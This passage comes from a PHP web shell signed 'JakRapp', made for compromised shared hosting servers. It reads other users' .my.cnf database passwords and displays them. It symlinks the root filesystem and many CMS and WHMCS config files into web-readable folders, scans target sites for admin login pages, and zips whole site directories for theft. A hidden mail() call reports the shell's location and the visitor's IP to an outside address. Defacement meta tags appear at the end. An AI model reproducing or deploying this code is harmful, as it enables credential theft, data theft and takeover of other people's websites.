  2291.     $ar1=explode($marqueurFinLien, $ar0[$i]);
  2292.     return trim($ar1[0]);
  2293. }
  2294. echo "<center>";
  2295. $d0mains = @file('/etc/named.conf');
  2296. $domains = scandir("/var/named");
  2297.  
  2298. if ($domains or $d0mains)
  2299. {
  2300.     $domains = scandir("/var/named");
  2301.     if($domains) {
  2302. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
  2303. $count=1;
  2304. $dc = 0;
  2305. $list = scandir("/var/named");
  2306. foreach($list as $domain){
  2307. if(strpos($domain,".db")){
  2308. $domain = str_replace('.db','',$domain);
  2309. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  2310. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  2311. $path = getcwd();
  2312.  
  2313. if (is_readable($dirz)) {
  2314. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  2315. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  2316. $password=entre2v2($p,'password="','"');
  2317. echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
  2318. $dc++;
  2319. }
  2320.  
  2321. }
  2322. }
  2323. echo '</table>';
  2324. $total = $dc;
  2325. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
  2326. echo '</center>';
  2327. }else{
  2328. $d0mains = @file('/etc/named.conf');
  2329.     if($d0mains) {
  2330. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
  2331. $count=1;
  2332. $dc = 0;
  2333. $mck = array();
  2334. foreach($d0mains as $d0main){
  2335.     if(@eregi('zone',$d0main)){
  2336.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
  2337.         flush();
  2338.         if(strlen(trim($domain[1][0])) >2){
  2339.             $mck[] = $domain[1][0];
  2340.         }
  2341.     }
  2342. }
  2343. $mck = array_unique($mck);
  2344. $usr = array();
  2345. $dmn = array();
  2346. foreach($mck as $o) {
  2347.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  2348.     $usr[] = $infos['name'];
  2349.     $dmn[] = $o;
  2350. }
  2351. array_multisort($usr,$dmn);
  2352. $dt = file('/etc/passwd');
  2353. $passwd = array();
  2354. foreach($dt as $d) {
  2355.     $r = explode(':',$d);
  2356.     if(strpos($r[5],'home')) {
  2357.         $passwd[$r[0]] = $r[5];
  2358.     }
  2359. }
  2360. $l=0;
  2361. $j=1;
  2362. foreach($usr as $r) {
  2363. $dirz = '/home/'.$r.'/.my.cnf';
  2364. $path = getcwd();
  2365. if (is_readable($dirz)) {
  2366. copy($dirz, ''.$path.'/'.$r.'.txt');
  2367. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  2368. $password=entre2v2($p,'password="','"');
  2369. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
  2370. $dc++;
  2371.                 flush();
  2372.                 $l=$l?0:1;
  2373.                 $j++;
  2374.                                 }
  2375.             }
  2376.                         }
  2377. echo '</table>';
  2378. $total = $dc;
  2379. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
  2380. echo '</center>';
  2381.  
  2382. }
  2383. }else{
  2384. echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
  2385. }
  2386.  
  2387. echo "</body></html>";
  2388. }
  2389. ?>
  2390. <?php
  2391. if (isset($_GET['jak']) && ($_GET['jak'] == 'sym')) {
  2392. ?>
  2393. <form action="?path=<?php echo $path; ?>&amp;jak=sym" method="post">
  2394.     <center><h2>Domain Viewer</h2></center><br><br>
  2395.     <?php
  2396.     function openBaseDir()
  2397. {
  2398. $openBaseDir = ini_get("open_basedir");
  2399. if (!$openBaseDir)
  2400.     {
  2401.         $openBaseDir = '<font color="green">OFF</font>';
  2402.     }
  2403.     else
  2404.     {
  2405.         $openBaseDir = '<font color="red">ON</font>';
  2406.     }    
  2407.     return $openBaseDir;
  2408. }
  2409.  
  2410.  
  2411. echo '
  2412.    <table width="95%" cellspacing="0" cellpadding="0" class="td1" >
  2413.    <td height="100" align="left" class="td1">';
  2414.     $pg = basename(__FILE__);
  2415.     $safe_mode = @ini_get('safe_mode');
  2416.     $dir = @getcwd();
  2417.     ////////////////////////////////////////////////////
  2418.     // LET'S PLAY ~
  2419.     ##.htaccess
  2420. @mkdir('jaks',0777);
  2421. @symlink("/","jaks/!");
  2422. $htaccss = "Options Indexes FollowSymLinks\nDirectoryIndex amis.txt\nAddType txt .php\nAddHandler txt .php";
  2423.  
  2424. file_put_contents("jaks/.htaccess",$htaccss);
  2425. $etc = file_get_contents("/etc/passwd");
  2426. $etcz = explode("\n",$etc);
  2427.  
  2428.  
  2429. ##Symlink to the ROOT :p
  2430. foreach($etcz as $etz){
  2431. $etcc = explode(":",$etz);
  2432. error_reporting(0);
  2433.  
  2434. $current_dir = posix_getcwd();
  2435. $dir = explode("/",$current_dir);
  2436.  
  2437. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
  2438. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
  2439. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
  2440. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
  2441. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"pee/".$etcc[0].'-PhpBB.txt');
  2442. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"pee/".$etcc[0].'-vBulletin.txt');
  2443. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
  2444. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
  2445. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
  2446. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
  2447. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"pee/".$etcc[0].'-IPB.txt');
  2448. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"pee/".$etcc[0].'-MyBB.txt');
  2449. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"pee/".$etcc[0].'-SMF.txt');
  2450. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"pee/".$etcc[0].'-Drupal.txt');
  2451. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"pee/".$etcc[0].'-e107.txt');
  2452. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"pee/".$etcc[0].'-Seditio.txt');
  2453. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"pee/".$etcc[0].'-osCommerce.txt');
  2454. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  2455. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  2456. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  2457. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  2458. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  2459. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  2460. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  2461. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  2462. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  2463. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  2464. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  2465. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  2466. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  2467. }
  2468. #############################
  2469.    if(is_readable("/var/named")){
  2470.     echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
  2471.     echo'<tr><td><center><b>SITE</b></center></td><td>
  2472.    <center><b>USER</b></center></td>
  2473.    <td></center><b>SYMLINK</b></center></td>';
  2474.     $list = scandir("/var/named");
  2475.     foreach($list as $domain){
  2476.     if(strpos($domain,".db")){
  2477.     $i += 1;
  2478.     $domain = str_replace('.db','',$domain);
  2479.     $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  2480.  
  2481.     echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
  2482.    <td class='td1'><center><font color='red'>".$owner['name']."</font></center></td>
  2483.    <td class='td1'><center><a href='jaks/!".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
  2484.         }
  2485.     }
  2486.     echo "<center>Total Domains Found: ".$i."</center><br />";
  2487.     }else{
  2488.     echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; }
  2489.  
  2490. break;
  2491.  
  2492. ##################################
  2493. error_reporting(0);
  2494. $etc = file_get_contents("/etc/passwd");
  2495. $etcz = explode("\n",$etc);
  2496. if(is_readable("/etc/passwd")){
  2497.  
  2498. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
  2499. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>';
  2500.  
  2501. $list = scandir("/var/named");
  2502.  
  2503. foreach($etcz as $etz){
  2504. $etcc = explode(":",$etz);
  2505.  
  2506. foreach($list as $domain){
  2507. if(strpos($domain,".db")){
  2508. $domain = str_replace('.db','',$domain);
  2509. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  2510. if($owner['name'] == $etcc[0])
  2511. {
  2512. $i += 1;
  2513. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center>
  2514. <td class='td1'><font color='red'>".$owner['name']."</font></center></td>
  2515. <td class='td1'><center><a href='jaks/!".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
  2516. }}}}
  2517. echo "<center>Total Domains Found: ".$i."</center><br />";}
  2518.  
  2519. break;
  2520. ###############################
  2521. if(is_readable("/etc/named.conf")){
  2522. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
  2523. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
  2524. $named = file_get_contents("/etc/named.conf");
  2525. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
  2526. foreach($domains[1] as $domain){
  2527. $domain = trim($domain);
  2528. $i += 1;
  2529. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  2530. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='jaks/!".$owner['dir']."/".$dir[3]."'
  2531. target='_blank'>DIR</a></center></td>";
  2532. }
  2533. echo "<center>Total Domains Found: ".$i."</center><br />";
  2534.  
  2535. } else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>"; }
  2536.  
  2537. break;
  2538. ############################
  2539. if(is_readable("/etc/valiases")){
  2540. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
  2541. echo'<tr><td><center><b>SITE</b></center></td><td>
  2542. <center><b>USER</b></center></td><td></center>
  2543. <b>SYMLINK</b></center></td>';
  2544. $list = scandir("/etc/valiases");
  2545. foreach($list as $domain){
  2546. $i += 1;
  2547. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  2548. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
  2549. <center><td class='td1'><font color='red'>".$owner['name']."</font></center></td>
  2550. <td class='td1'><center><a href='jaks/!".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
  2551. }
  2552. echo "<center>Total Domains Found: ".$i."</center><br />";
  2553. } else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; }
  2554.  
  2555. break;
  2556. }
  2557. ?>
  2558. <?php
  2559. if (isset($_GET['jak']) && ($_GET['jak'] == 'finder')) {
  2560. ?>
  2561. <form action="?&amp;jak=finder" method="post">
  2562. <?php
  2563. set_time_limit(0);
  2564. error_reporting(0);
  2565. $list['front'] =
  2566. "
  2567. admin
  2568. adm
  2569. admincp
  2570. admcp
  2571. cp
  2572. modcp
  2573. moderatorcp
  2574. adminare
  2575. admins
  2576. cpanel
  2577. controlpanel";
  2578. $list['end'] = "
  2579. admin1.php
  2580. admin1.html
  2581. admin2.php
  2582. admin2.html
  2583. yonetim.php
  2584. yonetim.html
  2585. yonetici.php
  2586. yonetici.html
  2587. ccms/
  2588. ccms/login.php
  2589. ccms/index.php
  2590. maintenance/
  2591. webmaster/
  2592. adm/
  2593. configuration/
  2594. configure/
  2595. websvn/
  2596. admin/
  2597. admin/account.php
  2598. admin/account.html
  2599. admin/index.php
  2600. admin/index.html
  2601. admin/login.php
  2602. admin/login.html
  2603. admin/home.php
  2604. admin/controlpanel.html
  2605. admin/controlpanel.php
  2606. admin.php
  2607. admin.html
  2608. admin/cp.php
  2609. admin/cp.html
  2610. cp.php
  2611. cp.html
  2612. administrator/
  2613. administrator/index.html
  2614. administrator/index.php
  2615. administrator/login.html
  2616. administrator/login.php
  2617. administrator/account.html
  2618. administrator/account.php
  2619. administrator.php
  2620. administrator.html
  2621. login.php
  2622. login.html
  2623. modelsearch/login.php
  2624. moderator.php
  2625. moderator.html
  2626. moderator/login.php
  2627. moderator/login.html
  2628. moderator/admin.php
  2629. moderator/admin.html
  2630. moderator/
  2631. account.php
  2632. account.html
  2633. controlpanel/
  2634. controlpanel.php
  2635. controlpanel.html
  2636. admincontrol.php
  2637. admincontrol.html
  2638. adminpanel.php
  2639. adminpanel.html
  2640. admin1.asp
  2641. admin2.asp
  2642. yonetim.asp
  2643. yonetici.asp
  2644. admin/account.asp
  2645. admin/index.asp
  2646. admin/login.asp
  2647. admin/home.asp
  2648. admin/controlpanel.asp
  2649. admin.asp
  2650. admin/cp.asp
  2651. cp.asp
  2652. administrator/index.asp
  2653. administrator/login.asp
  2654. administrator/account.asp
  2655. administrator.asp
  2656. login.asp
  2657. modelsearch/login.asp
  2658. moderator.asp
  2659. moderator/login.asp
  2660. moderator/admin.asp
  2661. account.asp
  2662. controlpanel.asp
  2663. admincontrol.asp
  2664. adminpanel.asp
  2665. fileadmin/
  2666. fileadmin.php
  2667. fileadmin.asp
  2668. fileadmin.html
  2669. administration/
  2670. administration.php
  2671. administration.html
  2672. sysadmin.php
  2673. sysadmin.html
  2674. phpmyadmin/
  2675. myadmin/
  2676. sysadmin.asp
  2677. sysadmin/
  2678. ur-admin.asp
  2679. ur-admin.php
  2680. ur-admin.html
  2681. ur-admin/
  2682. Server.php
  2683. Server.html
  2684. Server.asp
  2685. Server/
  2686. wp-admin/
  2687. administr8.php
  2688. administr8.html
  2689. administr8/
  2690. administr8.asp
  2691. webadmin/
  2692. webadmin.php
  2693. webadmin.asp
  2694. webadmin.html
  2695. administratie/
  2696. admins/
  2697. admins.php
  2698. admins.asp
  2699. admins.html
  2700. administrivia/
  2701. Database_Administration/
  2702. WebAdmin/
  2703. useradmin/
  2704. sysadmins/
  2705. admin1/
  2706. system-administration/
  2707. administrators/
  2708. pgadmin/
  2709. directadmin/
  2710. staradmin/
  2711. ServerAdministrator/
  2712. SysAdmin/
  2713. administer/
  2714. LiveUser_Admin/
  2715. sys-admin/
  2716. typo3/
  2717. panel/
  2718. cpanel/
  2719. cPanel/
  2720. cpanel_file/
  2721. platz_login/
  2722. rcLogin/
  2723. blogindex/
  2724. formslogin/
  2725. autologin/
  2726. support_login/
  2727. meta_login/
  2728. manuallogin/
  2729. simpleLogin/
  2730. loginflat/
  2731. utility_login/
  2732. showlogin/
  2733. memlogin/
  2734. members/
  2735. login-redirect/
  2736. sub-login/
  2737. wp-login/
  2738. login1/
  2739. dir-login/
  2740. login_db/
  2741. xlogin/
  2742. smblogin/
  2743. customer_login/
  2744. UserLogin/
  2745. login-us/
  2746. acct_login/
  2747. admin_area/
  2748. bigadmin/
  2749. project-admins/
  2750. phppgadmin/
  2751. pureadmin/
  2752. sql-admin/
  2753. radmind/
  2754. openvpnadmin/
  2755. wizmysqladmin/
  2756. vadmind/
  2757. ezsqliteadmin/
  2758. hpwebjetadmin/
  2759. newsadmin/
  2760. adminpro/
  2761. Lotus_Domino_Admin/
  2762. bbadmin/
  2763. vmailadmin/
  2764. Indy_admin/
  2765. ccp14admin/
  2766. irc-macadmin/
  2767. banneradmin/
  2768. sshadmin/
  2769. phpldapadmin/
  2770. macadmin/
  2771. administratoraccounts/
  2772. admin4_account/
  2773. admin4_colon/
  2774. radmind-1/
  2775. Super-Admin/
  2776. AdminTools/
  2777. cmsadmin/
  2778. SysAdmin2/
  2779. globes_admin/
  2780. cadmins/
  2781. phpSQLiteAdmin/
  2782. navSiteAdmin/
  2783. server_admin_small/
  2784. logo_sysadmin/
  2785. server/
  2786. database_administration/
  2787. power_user/
  2788. system_administration/
  2789. ss_vms_admin_sm/
  2790. adminarea/
  2791. bb-admin/
  2792. adminLogin/
  2793. panel-administracion/
  2794. instadmin/
  2795. memberadmin/
  2796. administratorlogin/
  2797. admin/admin.php
  2798. admin_area/admin.php
  2799. admin_area/login.php
  2800. siteadmin/login.php
  2801. siteadmin/index.php
  2802. siteadmin/login.html
  2803. admin/admin.html
  2804. admin_area/index.php
  2805. bb-admin/index.php
  2806. bb-admin/login.php
  2807. bb-admin/admin.php
  2808. admin_area/login.html
  2809. admin_area/index.html
  2810. admincp/index.asp
  2811. admincp/login.asp
  2812. admincp/index.html
  2813. webadmin/index.html
  2814. webadmin/admin.html
  2815. webadmin/login.html
  2816. admin/admin_login.html
  2817. admin_login.html
  2818. panel-administracion/login.html
  2819. nsw/admin/login.php
  2820. webadmin/login.php
  2821. admin/admin_login.php
  2822. admin_login.php
  2823. admin_area/admin.html
  2824. pages/admin/admin-login.php
  2825. admin/admin-login.php
  2826. admin-login.php
  2827. bb-admin/index.html
  2828. bb-admin/login.html
  2829. bb-admin/admin.html
  2830. admin/home.html
  2831. pages/admin/admin-login.html
  2832. admin/admin-login.html
  2833. admin-login.html
  2834. admin/adminLogin.html
  2835. adminLogin.html
  2836. home.html
  2837. rcjakar/admin/login.php
  2838. adminarea/index.html
  2839. adminarea/admin.html
  2840. webadmin/index.php
  2841. webadmin/admin.php
  2842. user.html
  2843. modelsearch/login.html
  2844. adminarea/login.html
  2845. panel-administracion/index.html
  2846. panel-administracion/admin.html
  2847. modelsearch/index.html
  2848. modelsearch/admin.html
  2849. admincontrol/login.html
  2850. adm/index.html
  2851. adm.html
  2852. user.php
  2853. panel-administracion/login.php
  2854. wp-login.php
  2855. adminLogin.php
  2856. admin/adminLogin.php
  2857. home.php
  2858. adminarea/index.php
  2859. adminarea/admin.php
  2860. adminarea/login.php
  2861. panel-administracion/index.php
  2862. panel-administracion/admin.php
  2863. modelsearch/index.php
  2864. modelsearch/admin.php
  2865. admincontrol/login.php
  2866. adm/admloginuser.php
  2867. admloginuser.php
  2868. admin2/login.php
  2869. admin2/index.php
  2870. adm/index.php
  2871. adm.php
  2872. affiliate.php
  2873. adm_auth.php
  2874. memberadmin.php
  2875. administratorlogin.php
  2876. admin/admin.asp
  2877. admin_area/admin.asp
  2878. admin_area/login.asp
  2879. admin_area/index.asp
  2880. bb-admin/index.asp
  2881. bb-admin/login.asp
  2882. bb-admin/admin.asp
  2883. pages/admin/admin-login.asp
  2884. admin/admin-login.asp
  2885. admin-login.asp
  2886. user.asp
  2887. webadmin/index.asp
  2888. webadmin/admin.asp
  2889. webadmin/login.asp
  2890. admin/admin_login.asp
  2891. admin_login.asp
  2892. panel-administracion/login.asp
  2893. adminLogin.asp
  2894. admin/adminLogin.asp
  2895. home.asp
  2896. adminarea/index.asp
  2897. adminarea/admin.asp
  2898. adminarea/login.asp
  2899. panel-administracion/index.asp
  2900. panel-administracion/admin.asp
  2901. modelsearch/index.asp
  2902. modelsearch/admin.asp
  2903. admincontrol/login.asp
  2904. adm/admloginuser.asp
  2905. admloginuser.asp
  2906. admin2/login.asp
  2907. admin2/index.asp
  2908. adm/index.asp
  2909. adm.asp
  2910. affiliate.asp
  2911. adm_auth.asp
  2912. memberadmin.asp
  2913. administratorlogin.asp
  2914. siteadmin/login.asp
  2915. siteadmin/index.asp
  2916. ADMIN/
  2917. paneldecontrol/
  2918. login/
  2919. cms/
  2920. admon/
  2921. ADMON/
  2922. administrador/
  2923. ADMIN/login.php
  2924. panelc/
  2925. ADMIN/login.html";
  2926. function template() {
  2927. echo '
  2928.  
  2929. <script type="text/javascript">
  2930. <!--
  2931. function insertcode($text, $place, $replace)
  2932. {
  2933.    var $this = $text;
  2934.    var logbox = document.getElementById($place);
  2935.    if($replace == 0)
  2936.        document.getElementById($place).innerHTML = logbox.innerHTML+$this;
  2937.    else
  2938.        document.getElementById($place).innerHTML = $this;
  2939. //document.getElementById("helpbox").innerHTML = $this;
  2940. }
  2941. -->
  2942. </script>
  2943. <br>
  2944. <br>
  2945. <h1 class="technique-two">
  2946.      
  2947.  
  2948.  
  2949. </h1>
  2950.  
  2951. <div class="wrapper">
  2952. <div class="red">
  2953. <div class="tube">
  2954. <center><table class="tabnet"><th colspan="2">Admin Finder</th><tr><td>
  2955. <form action="" method="post" name="xploit_form">
  2956.  
  2957. <tr>
  2958. <tr>
  2959.     <b><td>URL</td>
  2960.     <td><input class="inputz" type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 350px;" />
  2961.     </td>
  2962. </tr><tr>
  2963.     <td>404 string</td>
  2964.     <td><input class="inputz" type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 350px;" />
  2965.     </td></b>
  2966. </tr><br><td>
  2967. <span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Start Scan" align="center" />
  2968. </span></td></tr>
  2969. </form></td></tr>
  2970. <br /></table>
  2971. </div> <!-- /tube -->
  2972. </div> <!-- /red -->
  2973. <br />
  2974. <div class="green">
  2975. <div class="tube" id="rightcol">
  2976. Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
  2977. <b>Found ones:<br /></b>
  2978. </div> <!-- /tube -->
  2979. </div></center><!-- /green -->
  2980. <br clear="all" /><br />
  2981. <div class="blue">
  2982. <div class="tube" id="logbox">
  2983. <br />
  2984. <br />
  2985. Admin page Finder :<br /><br />
  2986. </div> <!-- /tube -->
  2987. </div> <!-- /blue -->
  2988. </div> <!-- /wrapper -->
  2989. <br clear="all"><br>';
  2990. }
  2991. function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
  2992.     if($br == 1) $msg .= "<br />";
  2993.     echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>";
  2994.     if($stop == 1) exit;
  2995.     @flush();@ob_flush();
  2996. }
  2997. function check($x, $front=0) {
  2998.     global $_POST,$site,$false;
  2999.     if($front == 0) $t = $site.$x;
  3000.     else $t = 'http://'.$x.'.'.$site.'/';
  3001.     $headers = get_headers($t);
  3002.     if (!eregi('200', $headers[0])) return 0;
  3003.     $data = @file_get_contents($t);
  3004.     if($_POST['xploit_404string'] == "") if($data == $false) return 0;
  3005.     if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
  3006.     return 1;
  3007. }
  3008.    
  3009. // --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  3010. template();
  3011. if(!isset($_POST['xploit_url'])) die;
  3012. if($_POST['xploit_url'] == '') die;
  3013. $site = $_POST['xploit_url'];
  3014. if ($site[strlen($site)-1] != "/") $site .= "/";
  3015. if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
  3016. $list['end'] = str_replace("\r", "", $list['end']);
  3017. $list['front'] = str_replace("\r", "", $list['front']);
  3018. $pathes = explode("\n", $list['end']);
  3019. $frontpathes = explode("\n", $list['front']);
  3020. show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
  3021. $verificate = 0;
  3022. foreach($pathes as $path) {
  3023.     show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0);
  3024.     $verificate++; show($verificate, 0, 0, 'verified', 1);
  3025.     if(check($path) == 0) show('not found', 1, 0, 'logbox', 0);
  3026.     else{
  3027.         show('<span style="color: #FF0000;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
  3028.         show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0);
  3029.     }
  3030. }
  3031. preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1];
  3032. if(substr($site, 0, 3) == "www") $site = substr($site, 4);
  3033. foreach($frontpathes as $frontpath) {
  3034.     show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
  3035.     $verificate++; show($verificate, 0, 0, 'verified', 1);
  3036.     if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0);
  3037.     else{
  3038.         show('<span style="color: #FF0000;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
  3039.         show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0);
  3040.     }
  3041.    
  3042. }
  3043. }
  3044. ?>
  3045. <?php
  3046. if(isset($_GET['x']) && ($_GET['x'] == 'maling')){ ?>
  3047. <form action="?y=<?php echo $pwd; ?>&amp;x=maling" method="post">
  3048. <form method="post" action="" enctype="multipart/form-data">
  3049. <input type=text name=sites size=40></nobr><br>
  3050. <input type="submit" name="go" value="Colong!" style="margin: 5px auto; hight: 25px; width: 100px;">
  3051. </form>
  3052. <?php
  3053. $site = explode("\r\n", $_POST['sites']);
  3054. $go = $_POST['go'];
  3055. if($go) {
  3056. foreach($site as $sites) {
  3057. @session_start();
  3058. @error_reporting(0);
  3059. @ini_set('error_log',NULL);
  3060. @ini_set('log_errors',0);
  3061. @ini_set('max_execution_time',0);
  3062. @ini_set('display_errors', 0);
  3063. @set_time_limit(0);
  3064. $folder="$sites";
  3065. $output="hasil-maling.zip";
  3066. $zip = new ZipArchive();
  3067.  
  3068. if ($zip->open($output, ZIPARCHIVE::CREATE) !== TRUE) {
  3069.     die ("Unable to open Archirve");
  3070. }
  3071.  
  3072. $all= new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder));
  3073.  
  3074. foreach ($all as $f=>$value) {
  3075.     $zip->addFile(realpath($f), $f) or die ("ERROR: Unable to add file: $f");
  3076. }
  3077. $zip->close();
  3078. echo "Selamat Anda Berhasil Mencuri Data Website ";
  3079. }
  3080. }
  3081. }
  3082. ?>
  3083. <?php
  3084. @ini_set('output_buffering', 0);
  3085. @ini_set('display_errors', 0);
  3086. set_time_limit(0);
  3087. ini_set('memory_limit', '64M');
  3088. header('Content-Type: text/html; charset=UTF-8');
  3089. $tujuanmail = '[email protected]';
  3090. $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
  3091. $pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
  3092. mail($tujuanmail, "Maho", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
  3093. ?>
  3094. <?php
  3095. if(isset($_GET['x']) && ($_GET['x'] == 'about'))
  3096.     {
  3097.     ?>
  3098.     <form action="?y=<?php echo $pwd; ?>&x=about" method="post">
  3099. <html>
  3100. <head>
  3101. <!-- SEO Meta Tag -->
  3102. <meta content='Hacked By JakRapp' name='description'/>
  3103. <meta content='Hacked By JakRapp, Tested By JakRapp, JakRapp Was Here, wned By JakRapp, JakRapp Come Back, Security By JakRapp, Tusboled By JakRapp, Anon JakRapp, Hacker JakRapp, Haxor JakRapp, JakRapp One Comando, sabun by jakrapp, JakRapp Defacer, Deface By JakRapp' name='keywords'/>
